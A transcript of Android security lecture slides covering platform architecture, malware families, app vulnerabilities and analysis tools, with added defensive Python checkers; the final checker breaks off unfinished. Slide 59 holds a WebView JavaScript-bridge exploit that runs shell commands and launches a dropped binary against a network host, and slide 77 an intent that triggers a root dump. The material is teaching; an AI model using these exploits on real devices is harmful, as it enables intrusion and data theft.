Android Security

Mingshen Sun
October 19, 2015

Lecture slides about Android Security for CMSC5726 Computer and Network Security, Spring 2014 in CSE, The Chinese University of Hong Kong.

Transcript

  1. Android Security
    Bob Mingshen Sun
    [email protected]
    November 2, 2015

  2. (figure) [1] http://blog.applause.com/android-or-ios-a-multi-stat-head-to-head-battle/2013/04/

  3. Introduction — Android Market Share
    Android climbed to 79 percent of smartphone market share in 2013. — Engadget
    Android dominates 81 percent of world smartphone market. — CNET
    [2] CNET
    Bob (CUHK) Android Security November 2, 2015 3 / 107

  4. Introduction — Android Malware
    Terrifying new smartphone malware tracks your swipes to
    steal your PIN.
    — BGR
    New Windows malware tries to infect Android devices
    connected to PCs.
    — PCWorld
    First Android bootkit malware spotted; reportedly found on
    over 350,000 mobile devices, most in China. — TNW

  5. Introduction — Oldboot
    Oldboot
    The Oldboot has infected more than 500,000 devices in China.
    Chinese retailers flashed this bootkit into the boot partition of
    Android phones they sold.
    Since the boot partition in Android will be loaded as a read-only
    RAM disk, all existing antivirus solutions can’t effectively clean it
    from infected devices.
    The Oldboot will try to connect with its C&C servers, download
    adware and install as system applications.
    It can also execute arbitrary remote commands with root
    permission.

  6. Outline I
    1 Introduction
    2 Background
    How to Build an Android Application?
    Application Fundamentals
    APK File Structure
    Android Architecture
    Android Platform Security Architecture
    Distribution Methods of Apps
    3 Attacks
    Android Malware
    Malware Distribution
    Vulnerabilities of Android OS
    Android Apps Security
    4 Analysis Tools

  7. Outline II
    Tools in Android SDK
    Static Analysis
    Dynamic Analysis
    Online Analysis
    5 Defense
    Obfuscation
    Android NDK
    Security Tips
    6 Conclusion

  8. Outline
    1 Introduction
    2 Background
    How to Build an Android Application?
    Application Fundamentals
    APK File Structure
    Android Architecture
    Android Platform Security Architecture
    Distribution Methods of Apps
    3 Attacks
    4 Analysis Tools
    5 Defense

  9. How to Build an Android Application?
    [3] http://developer.android.com/tools/building/index.html

  10. How to Build an Android Application? — Android Project
    Android Project
    |-- AndroidManifest.xml
    |-- src/
    |   `-- package_name/
    |       `-- MainActivity.java
    `-- res/
        |-- drawable-hdpi/
        |   `-- ic_launcher.png
        |-- layout/
        |   `-- activity_main.xml
        `-- values/
    AndroidManifest.xml: describes the fundamental characteristics of the app and defines each of its components.
    sdk version
    permission usage
    src/: main source files in Java.
    res/
    drawable pictures
    application layout in XML
    string and color definitions in XML

  11. How to Build an Android Application? — Hello World
    IDE: Eclipse with ADT plugin, Android Studio, Android SDK
    import android.app.Activity;
    import android.os.Bundle;
    import android.widget.TextView;

    public class MainActivity extends Activity {
        @Override
        protected void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);
            setContentView(R.layout.activity_main);
            // Look up the TextView declared in activity_main.xml and set its text.
            TextView tvHelloWorld = (TextView) findViewById(R.id.tv_hello_world);
            tvHelloWorld.setText("Hello World");
        }
    }

  12. How to Build an Android Application? — Hello World
    Layout: activity_main.xml
    <RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android"
        xmlns:tools="http://schemas.android.com/tools"
        android:layout_width="match_parent" android:layout_height="match_parent"
        tools:context=".MainActivity" >  <!-- root element name assumed; lost in extraction -->
        <TextView android:id="@+id/tv_hello_world"
            android:layout_width="wrap_content" android:layout_height="wrap_content"
            android:text="TextView" />
    </RelativeLayout>


  13. How to Build an Android Application? — Hello World
    AndroidManifest.xml
    <manifest xmlns:android="http://schemas.android.com/apk/res/android"
        package="com.example.helloworld"
        android:versionCode="1"
        android:versionName="1.0" >
        <uses-sdk
            android:minSdkVersion="8"
            android:targetSdkVersion="18" />
        <application
            android:allowBackup="true"
            android:icon="@drawable/ic_launcher"
            android:label="@string/app_name"
            android:theme="@style/AppTheme" >
            <activity
                android:name="com.example.helloworld.MainActivity"
                android:label="@string/app_name" >
                <!-- child elements of the activity were lost in extraction -->
            </activity>
        </application>
    </manifest>

  14. How to Build an Android Application? — Details
    A detailed look at the build process
    1 The Android Asset Packaging Tool (aapt) takes the resource files and compiles them.
    2 The aidl tool converts .aidl interfaces.
    3 The Java compiler compiles all Java code into .class files.
    4 The dex tool converts the .class files into Dalvik bytecode.
    5 All non-compiled and compiled resources are packaged into an .apk file.

  15. How to Build an Android Application? — Details
    A detailed look at the build process (cont.)
    6 Sign the package with a key before installation.
    7 Align the file with zipalign to decrease memory usage.
    [4] http://developer.android.com/tools/building/index.html

  16. Application Fundamentals
    App components
    Activities: an activity represents a single screen with a user interface.
    Services: a service is a component that runs in the background to perform long-running operations or to perform work for remote processes.
    Content providers: a content provider manages a shared set of app data.
    Broadcast receivers: a broadcast receiver is a component that responds to system-wide broadcast announcements.
    Activating components: intents

  17. Application Fundamentals — Activity Lifecycle
    Activity states
    [7]

  18. Application Fundamentals — Activity Lifecycle
    Activity lifecycle methods
    [7]

  19. Application Fundamentals
    The manifest file
    declaring components
    <manifest ... >
        <application ... >
            <activity ...
                      android:label="@string/example_label" ... >
            </activity>
            ...
        </application>
    </manifest>
    declaring component capabilities
    declaring app requirements

  20. APK File Structure
    APK files are a type of archive file, specifically zip-format packages based on the JAR file format.
    $ file facebook.apk
    facebook.apk: Zip archive data, at least v2.0 to extract
    $ unzip facebook.apk -d facebook
    $ tree facebook
    facebook/
    |-- AndroidManifest.xml
    |-- classes.dex
    |-- resources.arsc
    |-- lib/
    |-- assets/
    |-- res/
    `-- META-INF/
        |-- MANIFEST.MF
        |-- CERT.RSA
        `-- CERT.SF

  21. APK File Structure — Details
    AndroidManifest.xml: the compiled AndroidManifest.xml (Android binary XML), which is not human-readable.
    classes.dex: the classes compiled in the dex file format understood by the Dalvik virtual machine.
    META-INF: the signing certificate and the SHA-1 digests of the package entries.
    lib: native libraries for the different platforms (armeabi, x86, mips).
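The SHA-1 digests that META-INF/MANIFEST.MF records for every entry are the first thing to check when deciding whether an APK's contents still match what its signer packaged. The Python below is an added example, not code from the slides or from any tool the slides name: it builds a constructed, minimal APK-like zip in memory and then verifies each entry against the manifest, the way a triage script would on a real .apk. The entry contents, the placeholder CERT.SF/CERT.RSA files and all names are constructed.

```python
"""Added example: verify an APK's META-INF/MANIFEST.MF digests.

Builds a constructed, minimal APK-like zip in memory (not a real app) and
checks that every entry's content still matches the SHA1-Digest recorded
for it when the package was signed."""
import base64
import hashlib
import io
import zipfile

# Entries every signed APK of this era carries (compare the facebook.apk listing).
EXPECTED_ENTRIES = ("AndroidManifest.xml", "classes.dex", "META-INF/MANIFEST.MF",
                    "META-INF/CERT.SF", "META-INF/CERT.RSA")


def sha1_digest_b64(data: bytes) -> str:
    """Per-entry digest format used in JAR/APK manifests: base64(SHA-1(content))."""
    return base64.b64encode(hashlib.sha1(data).digest()).decode("ascii")


def build_manifest(entries: dict) -> bytes:
    """Render a MANIFEST.MF with one Name/SHA1-Digest section per entry."""
    lines = ["Manifest-Version: 1.0", "Created-By: constructed-example", ""]
    for name, data in entries.items():
        lines += [f"Name: {name}", f"SHA1-Digest: {sha1_digest_b64(data)}", ""]
    return "\r\n".join(lines).encode("utf-8")


def build_sample_apk(tamper: bool = False) -> bytes:
    """Constructed APK-like zip. CERT.SF and CERT.RSA are placeholders: a real
    signature block needs the developer's private key, which is not modelled."""
    entries = {
        "AndroidManifest.xml": b"\x03\x00\x08\x00constructed-binary-xml",
        "classes.dex": b"dex\n035\x00constructed-dex-payload",
        "resources.arsc": b"\x02\x00\x0c\x00constructed-resources",
    }
    manifest = build_manifest(entries)
    if tamper:
        # Simulate a crude repackaging: classes.dex swapped after signing.
        entries["classes.dex"] = b"dex\n035\x00injected-payload"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, data in entries.items():
            z.writestr(name, data)
        z.writestr("META-INF/MANIFEST.MF", manifest)
        z.writestr("META-INF/CERT.SF", b"placeholder-signature-file")
        z.writestr("META-INF/CERT.RSA", b"placeholder-pkcs7-block")
    return buf.getvalue()


def parse_manifest(text: str) -> dict:
    """Map entry name -> recorded SHA1-Digest from the manifest's sections.
    (JAR continuation lines for names longer than 72 bytes are not handled.)"""
    digests = {}
    for section in text.replace("\r\n", "\n").split("\n\n"):
        fields = dict(line.split(": ", 1) for line in section.splitlines() if ": " in line)
        if "Name" in fields and "SHA1-Digest" in fields:
            digests[fields["Name"]] = fields["SHA1-Digest"]
    return digests


def check_apk(apk_bytes: bytes) -> dict:
    """First-pass triage of an APK: missing standard entries, entries whose
    content no longer matches MANIFEST.MF, and entries the manifest never listed."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = set(z.namelist())
        recorded = {}
        if "META-INF/MANIFEST.MF" in names:
            recorded = parse_manifest(z.read("META-INF/MANIFEST.MF").decode("utf-8"))
        mismatched = [name for name, digest in recorded.items()
                      if name in names and sha1_digest_b64(z.read(name)) != digest]
        unlisted = [n for n in sorted(names)
                    if not n.startswith("META-INF/") and n not in recorded]
    return {"missing": [e for e in EXPECTED_ENTRIES if e not in names],
            "digest_mismatch": mismatched, "unlisted": unlisted}


if __name__ == "__main__":
    print("clean:   ", check_apk(build_sample_apk()))
    print("tampered:", check_apk(build_sample_apk(tamper=True)))
```

A digest mismatch only catches crude in-place edits. A repackager who regenerates MANIFEST.MF and re-signs with their own key passes this check, which is why the signer certificate in CERT.RSA should also be compared with the original developer's (the point of slide 33).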

  22. Android Architecture

  23. Android Architecture
    Linux Kernel
    drivers for hardware, networking, file system access and
    inter-process communication
    Libraries: native libraries, daemons and services (written in C
    or C++)
    Android Runtime
    Dalvik Virtual Machine
    Supported core libraries
    Application Framework
    framework services and libraries (written mostly in Java)
    most framework code executes in a Dalvik virtual machine.
    Applications: pre-installed applications & applications from
    marketplaces.
    written in Java, executing in Dalvik VM.

  24. Android Architecture — Dalvik Virtual Machine
    The Dalvik VM is a register-based virtual machine for Java code.
    Optimized to use less space.
    Dalvik byte code (.dex file) rather than Java byte code (.class).
    More… [6]

  25. Android Platform Security Architecture
    To protect user data, protect system resources (including the network) and isolate applications, Android provides these key security features:
    Robust security at the OS level through the Linux kernel
    Mandatory application sandbox for all applications
    Secure interprocess communication
    Application signing
    Application-defined and user-granted permissions

  26. Android Platform Security Architecture — Sandbox
    a multi-user Linux system in which each app is a different user.
    the system assigns each app a unique Linux user ID.
    only the user ID assigned to that app can access its resources.
    each process has its own VM.
    every app runs in its own Linux process. [10]

  27. Android Platform Security Architecture — Inter-process Communication
    ICC: Inter-component communication
    IPC: Inter-process communication
    Why IPC?
    Each process runs in its own memory address space.
    Provides data isolation.
    Prevents harmful interaction.

  28. Android Platform Security Architecture — Inter-component Communication
    ICC describes how the different types of Android components communicate with each other.
    Component view of ICC: Intents between Activity, Service, Content Provider and Broadcast Receiver
    [5]

  29. Android Platform Security Architecture — Inter-process Communication
    GNU/Linux: signals, pipes, sockets, semaphores, messages, shared memory.
    Android: Binder — a lightweight RPC (Remote Procedure Call) mechanism.

  30. Android Platform Security Architecture — Inter-process Communication
    ServiceManager: manages registered services (register/delete/query).
    Service provider: registers with the ServiceManager.
    Service user: requests a service from the ServiceManager and executes remote calls.

  31. Android Platform Security Architecture — Fine-grained Permission Mechanism
    accessing protected APIs:
    Camera functions
    Location data (GPS)
    Bluetooth functions
    Telephony functions
    SMS/MMS functions
    Network/data connections
    Permissions are declared explicitly in AndroidManifest.xml.

  32. Android Platform Security Architecture — Application Signing
    The Android system requires that all installed applications be digitally signed with a certificate whose private key is held by the application’s developer.
    All applications must be signed.
    A special debug key is used for testing and debugging.
    Sign with your private key when publishing.
    Self-signed certificates; no certificate authority is needed.
    Expiration date.
    Keytool & Jarsigner
    zipalign

  33. Android Platform Security Architecture — Application Signing
    Motivations for APK signing:
    Updating apps.
    Ensuring an application is unmodified.
    Sharing data between applications from the same developer.

  34. Distribution Methods of Apps
    Google Play (official market)
    More secure, but still hosts malware.
    Third-party markets/forums
    popular in China
    fewer restrictions
    a large amount of malware

  35. Outline
    1 Introduction
    2 Background
    3 Attacks
    Android Malware
    Malware Distribution
    Vulnerabilities of Android OS
    Android Apps Security
    4 Analysis Tools
    5 Defense

  36. Subsection 1
    Android Malware

  37. Android Malware — Introduction
    There is a massive growth in the volume of malware families
    and samples. — Symantec
    [12]

  38. Android Malware — Introduction
    Top ten app categories with the highest percentage of malware.
    On third-party app stores, the most dangerous is the Games/Arcade
    & Action category followed by the Photography category.
    [12]

  39. Android Malware — Introduction
    Third-party app stores hosting the most malware from January to
    June 2013.
    Although malware slips into Google Play, most malware is hosted
    on third-party app stores. There are also stores that only host
    malware.
    [12]

  40. Android Malware — Characterization
    Characterized by
    Malware installation
    Activation
    Malicious payloads

  41. Android Malware — Characterization
    Malware installation
    Repackaging
    Update attacks
    Drive-by Download
    Others

  42. Android Malware — Characterization
    Repackaged Malware
    Characteristics of repackaged malware
    one of the most common techniques used by malware
    piggybacks malicious payloads onto popular applications
    Steps
    download apps
    disassemble the apk file
    smali/baksmali
    apktool
    IDA Pro
    enclose malicious payloads
    re-assemble and submit to official or alternative Android markets.

  43. Android Malware — Characterization
    Repackaged Malware
    Case study — Flappy Bird [14]
    massively popular small game on smartphones
    exactly the same appearance as the original version
    fake Android Flappy Bird
    Premium Service Abusers — apps that send messages to premium numbers, causing unwanted charges on victims’ phone bills
    especially rampant in app markets in Russia and Vietnam

  44. Android Malware — Characterization
    Repackaged Malware
    Case study — Flappy Bird [14]
    read/send text message permission, which is not required in the original version
    sends messages to premium numbers (8777 & 8738)
    connects to a C&C server to receive instructions
    information leakage
    Other repackaged game malware
    Candy Crush
    Angry Birds Space
    Temple Run 2

  45. Android Malware — Characterization
    Update Attack
    repackage popular apps
    do not enclose the payload as a whole
    piggyback an update component that will fetch or download the malicious payloads at runtime
    Static scanning?

  46. Android Malware — Characterization
    Update Attack
    Case Study — BaseBridge
    an update dialogue saying that a new version is available
    the malicious payload will then be installed
    [15]

  47. Android Malware — Characterization
    Drive-by Download
    entice users to download “interesting” or “feature-rich” apps
    GGTracker in-app advertisement
    Jifake QR code
    Others
    spyware
    fake apps
    intentional malicious apps
    rely on the root privilege

  48. Android Malware — Characterization
    Characterized by Activation
    BOOT_COMPLETED
    SMS_RECEIVED
    ACTION_MAIN
    events combination

  49. Android Malware — Characterization
    Characterized by Malicious Payloads
    privilege escalation
    remote control
    C&C server
    botnet
    financial charge
    subscribe to premium-rate services
    information collection
    SMS messages
    phone numbers
    email address
    installed package list?

  50. Android Malware — Evolution
    From naive repackaging to sophisticated obfuscation
    DroidKungFu
    root exploits
    C&C servers
    shadow payloads: apk package
    obfuscation, JNI

  51. Android Malware — Evolution
    Bleeding-edge malware
    AVPasser: anti-detection
    Report: http://contagiominidump.blogspot.hk/2014/01/android-oldboot-mouabads.html
    Oldboot: bootkit on Android
    “modify devices’ boot partition and booting script file to launch system service and extract malicious application during the early stage of system’s booting”
    “Due to the special RAM disk feature of Android devices’ boot partition, all current mobile antivirus product in the world can’t completely remove this Trojan or effectively repair the system.”
    http://blogs.360.cn/360mobile/2014/01/17/oldboot-the-first-bootkit-on-android/

  52. Android Malware — Distribution
    [8]

  53. Subsection 3
    Vulnerabilities of Android OS

  54. Permission Abuses
    Android Permission Mechanism
    permissions are requested before installation
    once accepted, the user is never asked again
    the user has no idea when/where/how these permissions are used
    Permission abuses: 37 permissions for a map application.

  55. Capabilities Leaks
    Permission re-delegation
    Malware does not have the permission to send text messages.
    A legitimate application has the permission.
    The legitimate application accidentally exposes its component to others without verification.
    Malware uses the permission of the deputy (the legitimate application) to complete the malicious behaviour.
    [4]

  56. Collusion Attack
    malicious applications collude to combine their permissions
    and perform actions beyond their individual privileges

  57. WebView Vulnerabilities
    What is WebView?
    an embedded browser inside an app
    web applications for cross-platform use
    HTML5 and JavaScript
    How do apps interact with the web content?
    Apps -> Web pages
    apps can inject JavaScript code into web pages (e.g., load a JavaScript file into the page)
    apps can monitor and intercept events that occur within web pages (e.g., the onPageFinished event)
    Web pages -> Apps
    apps can register interfaces with the WebView (e.g., a file operations interface)
    JavaScript code can invoke these interfaces (e.g., JavaScript can read/write internal files)

  58. WebView Vulnerabilities — Threat Models
    [9]

  59. WebView Vulnerabilities — Case Study
    Abusing WebView JavaScript Bridges
    function execute(cmdArgs) {
        return SmokeyBear.getClass()
            .forName("java.lang.Runtime")
            .getMethod("getRuntime", null)
            .invoke(null, null)
            .exec(cmdArgs);
    }
    execute(["/system/bin/sh", "-c", "echo '" + armBinary +
             "' > /data/data/com.example.webviewhack/armB2"]);
    execute(["chmod", "755", "/data/data/com.example.webviewhack/armB2"]);
    var p = execute(["/data/data/com.example.webviewhack/armB2",
                     "192.168.1.116", "/mnt/sdcard"]);
    document.write(getContents(p.getInputStream()));

  60. Root Exploits
    What is rooting?
    Linux root user
    get around any restrictions
    Why would you root?
    access entire file system
    install special apps
    flash custom ROMs
    Why wouldn’t you root?
    void your warranty
    brick your phone
    security risk: you may accidentally disclose root privilege to malware

  61. Root Exploits
    How to gain root in Android?
    Linux kernel exploits: CVE-2012-0056, CVE-2009-2692.
    (http://www.cvedetails.com/)
    Android exploits: GingerBreak, zergRush.
    Third-party firmware with root privilege.

  62. Android Apps Security [5]
    data storing
    data transportation
    password and authentication
    component capability leaks
    others
    [5] Claud Xiao. “Android Apps Security in Practice”. In: xKungfu. 2013.

  63. Android Apps Security — Data storing
    Data Storing
    External storage (SD card):
    no permission management
    read/write anything on external storage
    Internal storage (SQLite, XML, File):
    protected by user id
    need root to access

  64. Android Apps Security — Data storing
    Attack Surface: storing privacy on SD card.
    Example: backup data, IM messages, SNS data
    Problem: can be accessed by others
    Consequence: privacy leakage
    Solution: encryption

  65. Android Apps Security — Data storing
    Attack Surface: storing dynamic payloads on SD card.
    Example: store downloaded APK, DEX and JAR files on the SD card and load/install them at runtime
    Problem: manipulated by others
    Consequence: phishing, malware, privacy
    Solution: check authority and integrity before installation

  66. Android Apps Security — Data storing
    Attack Surface: storing configurations on SD card.
    Example: storing configuration data in plain text
    Problem: manipulated by others
    Consequence: phishing, malware, privacy leakage, MITM attack, SQL injection
    Solution: internal storage, encryption, checking authority and integrity before use

  67. Android Apps Security — Data storing
    Attack Surface: world readable/writeable internal file
    Example: sharing data between apps using Context.MODE_WORLD_READABLE or Context.MODE_WORLD_WRITEABLE
    Problem: manipulated by others
    Consequence: privacy leakage
    Solution: Content Provider; do not set internal data world readable or writeable

  68. Android Apps Security — Data storing
    Attack Surface: storing privacy in internal storage
    Example: password, credit card number in plain text
    Problem: accessible with root
    Consequence: privacy leakage
    Solution: do not store this information; encryption; other authentication methods

  69. Android Apps Security — Data transportation
    Attack Surface: plain text transportation.
    Example: passwords, session keys and private data sent in plain text
    Problem: open WiFi, sniffing
    Consequence: privacy leakage
    Solution: TLS/SSL

  70. Example
    POST /api/checkaccount HTTP/1.1
    User-Agent: MomoChat/1.11build Android/12 (LT18i; Android 2.3.4; zh_CN)
    Content-Length: 249
    Content-Type: application/x-www-form-urlencoded
    Host: www.immomo.com:80
    Connection: Keep-Alive

    uid=85dab7d268769df46abe111a82976931&phone_netWork=2&screen=480x854&model=LT18i&rom=2.3.4&phone_type=GSM&device_type=android&account=xxxxxx&mac=5c%3Ab5%3A24%3A09%3Ae1%3A58&market_source=1&buildnumber=4.0.2.A.0.58%2Fxf_v3w&password=xxxxxx&version=12
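As an added example of checking a capture like the one above (not code from the slides), the following Python parses a constructed HTTP request modelled on it, with dummy field values and an example.com host, and reports which sensitive form fields travel without TLS. The field-name patterns and the "port 80 means clear text" inference are this example's own assumptions.

```python
"""Added example: flag sensitive form fields sent over clear-text HTTP.

The capture below is constructed (dummy values, example.com host), modelled
on the request shown above, so the checker can run offline."""
import re
from urllib.parse import parse_qs

SAMPLE_REQUEST = (
    "POST /api/checkaccount HTTP/1.1\r\n"
    "User-Agent: ExampleChat/1.0 Android/12 (LT18i; Android 2.3.4; zh_CN)\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: www.example.com:80\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
    "uid=0123456789abcdef&model=LT18i&account=alice"
    "&mac=5c%3Ab5%3A24%3A09%3Ae1%3A58&password=hunter2&version=12"
)

# Field-name patterns a reviewer would flag, grouped by what they leak.
# These patterns are this example's assumption, not an Android or HTTP rule.
SENSITIVE_FIELDS = {
    "credential": re.compile(r"^(pass(word|wd)?|pwd|pin|token|session(_?key)?)$", re.I),
    "account_name": re.compile(r"^(account|user(name)?|login)$", re.I),
    "device_identifier": re.compile(r"^(mac|imei|imsi|android_?id|device_?id|uid)$", re.I),
}


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def is_cleartext(headers: dict) -> bool:
    """A capture does not record the scheme, so infer it from the Host port:
    anything other than 443 is treated as plain HTTP (assumption)."""
    host = headers.get("host", "")
    port = int(host.rsplit(":", 1)[1]) if ":" in host else 80
    return port != 443


def find_cleartext_leaks(raw: str) -> dict:
    """Map leak category -> sorted field names for a form POST without TLS."""
    req = parse_request(raw)
    content_type = req["headers"].get("content-type", "")
    if not is_cleartext(req["headers"]):
        return {}
    if not content_type.startswith("application/x-www-form-urlencoded"):
        return {}
    findings = {}
    for field in parse_qs(req["body"], keep_blank_values=True):
        for category, pattern in SENSITIVE_FIELDS.items():
            if pattern.match(field):
                findings.setdefault(category, []).append(field)
    return {category: sorted(names) for category, names in findings.items()}


if __name__ == "__main__":
    for category, names in find_cleartext_leaks(SAMPLE_REQUEST).items():
        print(f"{category}: {', '.join(names)}")
```

Run over the constructed capture this reports the password, the account name and the MAC/uid identifiers; the same request with a 443 port reports nothing, which is the point of the "Solution: TLS/SSL" line above.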

  71. Android Apps Security — Data transportation
    Attack Surface: SSL certificate
    Example: trusting all certificates
    Problem: MITM attack
    Consequence: privacy leakage
    Solution: CA, keystore

  72. Android Apps Security — Data transportation
    Attack Surface: SMS message
    Example: use SMS message to register, password
    Problem: send, read, hijack
    Consequence: privacy leakage
    Solution: HTTPS

  73. Android Apps Security — Password
    Attack Surface:
    weak password, short password, base64, XOR
    session key: hash(account+password)
    IMEI, IMSI

  74. Android Apps Security — Capability Leaks
    Attack Surface: Intent
    call B => execution
    call B with parameters => results
    call B => results
    fake B => access A’s data
    fake B => triggered by A, phishing

  75. Example









  76. Example
    if ("284".equals(paramIntent.getData().getHost())) {
        asyncExecute(new Runnable() {
            public void run() {
                try {
                    String str = CitBroadcastReceiver.TAG;
                    String[] arrayOfString = new String[3];
                    arrayOfString[0] = "bugreport";
                    arrayOfString[1] = ">";
                    arrayOfString[2] = m_logFileName;
                    // Runs "bugreport > <log file>" as root; reachable by any app
                    // that can broadcast the secret-code intent (next slide).
                    CitUtils.rootExecProgram(str, arrayOfString, true);
                } catch (Exception e) {
                    // exception handling elided
                }
            }
        });
    }

  77. Example
    Attack:
    Intent intent = new Intent();
    intent.setAction("android.provider.Telephony.SECRET_CODE");
    intent.setData(Uri.parse("android_secret_code://284"));
    sendBroadcast(intent);
    executes bugreport with root privilege
    dumps system info onto the SD card

  78. Android Apps Security — Capability Leaks
    Attack Surface: Intent
    Solution: signature permissions; permission checking
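The capability-leak checks the slides describe (a component gated by a signature permission versus one that is exported with no check at all) can be applied statically to a decoded AndroidManifest.xml. The Python below is an added example and not part of the slides: it constructs a sample manifest with a secret-code receiver modelled on slides 75 to 77, lists the requested permissions (useful for spotting the extra SMS permissions of a repackaged app, slide 44, and for the permission-abuse point of slide 54), and reports exported components that are reachable without a signature permission. The component and permission names are constructed, and the exported-by-default rule implemented is the pre-Android-12 one.

```python
"""Added example: static checks on a decoded AndroidManifest.xml.

Lists requested permissions (to spot additions in a repackaged app) and
reports exported components that any other app can reach without holding a
signature-level permission. The manifest below is constructed."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")
# Permissions whose abuse the slides describe (premium SMS, data collection).
DANGEROUS = {"android.permission.SEND_SMS", "android.permission.READ_SMS",
             "android.permission.RECEIVE_SMS", "android.permission.READ_CONTACTS",
             "android.permission.ACCESS_FINE_LOCATION", "android.permission.CALL_PHONE"}

# Constructed manifest: the receiver mirrors the secret-code pattern of the
# preceding example; names and permissions are made up for this example.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.constructed">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <permission android:name="com.example.constructed.permission.DEPUTY"
        android:protectionLevel="signature"/>
    <application>
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <receiver android:name=".SecretCodeReceiver">
            <intent-filter>
                <action android:name="android.provider.Telephony.SECRET_CODE"/>
                <data android:scheme="android_secret_code"/>
            </intent-filter>
        </receiver>
        <service android:name=".SmsService" android:exported="true"
            android:permission="com.example.constructed.permission.DEPUTY"/>
        <service android:name=".SyncService" android:exported="false"/>
    </application>
</manifest>"""


def attr(elem, name):
    """Read an attribute from the android: namespace."""
    return elem.get(f"{{{ANDROID_NS}}}{name}")


def requested_permissions(manifest_xml):
    root = ET.fromstring(manifest_xml)
    return sorted(attr(e, "name") for e in root.iter("uses-permission"))


def dangerous_permissions(manifest_xml):
    return sorted(set(requested_permissions(manifest_xml)) & DANGEROUS)


def added_permissions(original_xml, suspect_xml):
    """Permissions a suspect (possibly repackaged) build requests beyond the original."""
    return sorted(set(requested_permissions(suspect_xml))
                  - set(requested_permissions(original_xml)))


def is_exported(component):
    """Default rule before Android 12: a component with an intent-filter is
    exported unless android:exported="false"; one without is private.
    (Content providers had a different historical default, not modelled.)"""
    explicit = attr(component, "exported")
    if explicit is not None:
        return explicit == "true"
    return component.find("intent-filter") is not None


def is_launcher(component):
    return any(attr(c, "name") == "android.intent.category.LAUNCHER"
               for c in component.iter("category"))


def signature_permissions(root):
    return {attr(p, "name") for p in root.iter("permission")
            if attr(p, "protectionLevel") in ("signature", "signatureOrSystem")}


def find_unprotected_exports(manifest_xml):
    """Exported, non-launcher components reachable without a signature permission."""
    root = ET.fromstring(manifest_xml)
    sig_perms = signature_permissions(root)
    findings = []
    for tag in COMPONENT_TAGS:
        for comp in root.iter(tag):
            if not is_exported(comp) or is_launcher(comp):
                continue
            perm = attr(comp, "permission")
            if perm is None:
                findings.append((tag, attr(comp, "name"), "exported without permission"))
            elif perm not in sig_perms:
                findings.append((tag, attr(comp, "name"),
                                 f"guarded by non-signature permission {perm}"))
    return findings


if __name__ == "__main__":
    print(dangerous_permissions(SAMPLE_MANIFEST))
    print(find_unprotected_exports(SAMPLE_MANIFEST))
```

The checker only knows the `<permission>` elements of this one manifest, so a component guarded by a permission declared elsewhere (a platform permission, or one from another app by the same developer) is reported as non-signature and needs a manual look. A manifest flag is also only half the story: an exported component that checks the caller itself (the "permission checking" solution above) is safe even though it is listed here.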

  79. Android Apps Security — Others
    Attack Surface:
    Logcat
    Open WiFi
    WebView

  80. Outline
    1 Introduction
    2 Background
    3 Attacks
    4 Analysis Tools
    Tools in Android SDK
    Static Analysis
    Dynamic Analysis
    Online Analysis
    5 Defense

  81. Tools in Android SDK
    adb: Android Debug Bridge (adb) is a versatile command line tool
    that lets you communicate with an emulator instance or connected
    Android-powered device.
    $ adb install ...apk
    $ adb shell
    $ adb pull
    $ adb push
    logcat: The Android logging system provides a mechanism for
    collecting and viewing system debug output.
    $ adb logcat
    log information ...
    Others:
    aapt: Android Asset Packaging Tool
    keytool & jarsigner: sign your application
    zipalign: align the final package

  82. Static Analysis — Fundamentals
    Recall
    .java -> .class -> classes.dex
    zip classes.dex into apk file with other resources
    dex file is bytecode file for Dalvik VM
    Reverse engineer?
    .dex format
    bytecode format
    instruction formats
    specifications: https://source.android.com/devices/tech/dalvik/dalvik-bytecode.html
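Reverse engineering a .dex file starts with its header. The layout used below follows the Dalvik bytecode specification linked above: an 8-byte magic, an Adler-32 checksum over everything after the checksum field, a SHA-1 signature over everything after the signature field, then twenty little-endian size/offset words. The Python is an added example, not from the slides: it builds a constructed, minimal DEX-shaped file (no code items, only a valid header and a data blob), parses the header and verifies the checksum and signature, which is also a cheap first test for crude in-place tampering with a classes.dex.

```python
"""Added example: parse and verify a DEX header.

Layout follows the Dalvik bytecode specification linked above. A constructed,
minimal DEX-shaped file is built so the checks can run without a real
classes.dex; it carries no code items, only a valid header and a data blob."""
import hashlib
import struct
import zlib

DEX_HEADER_SIZE = 0x70
ENDIAN_CONSTANT = 0x12345678
KNOWN_MAGIC = {b"dex\n035\x00", b"dex\n036\x00", b"dex\n037\x00",
               b"dex\n038\x00", b"dex\n039\x00"}
# The twenty little-endian uint32 fields that follow the 20-byte signature.
FIELD_NAMES = ("file_size", "header_size", "endian_tag", "link_size", "link_off",
               "map_off", "string_ids_size", "string_ids_off", "type_ids_size",
               "type_ids_off", "proto_ids_size", "proto_ids_off", "field_ids_size",
               "field_ids_off", "method_ids_size", "method_ids_off",
               "class_defs_size", "class_defs_off", "data_size", "data_off")


def parse_dex_header(blob: bytes) -> dict:
    if len(blob) < DEX_HEADER_SIZE:
        raise ValueError("shorter than a DEX header")
    header = dict(zip(FIELD_NAMES, struct.unpack_from("<20I", blob, 32)))
    header["magic"] = blob[:8]
    header["checksum"] = struct.unpack_from("<I", blob, 8)[0]
    header["signature"] = blob[12:32].hex()
    return header


def verify_dex(blob: bytes) -> list:
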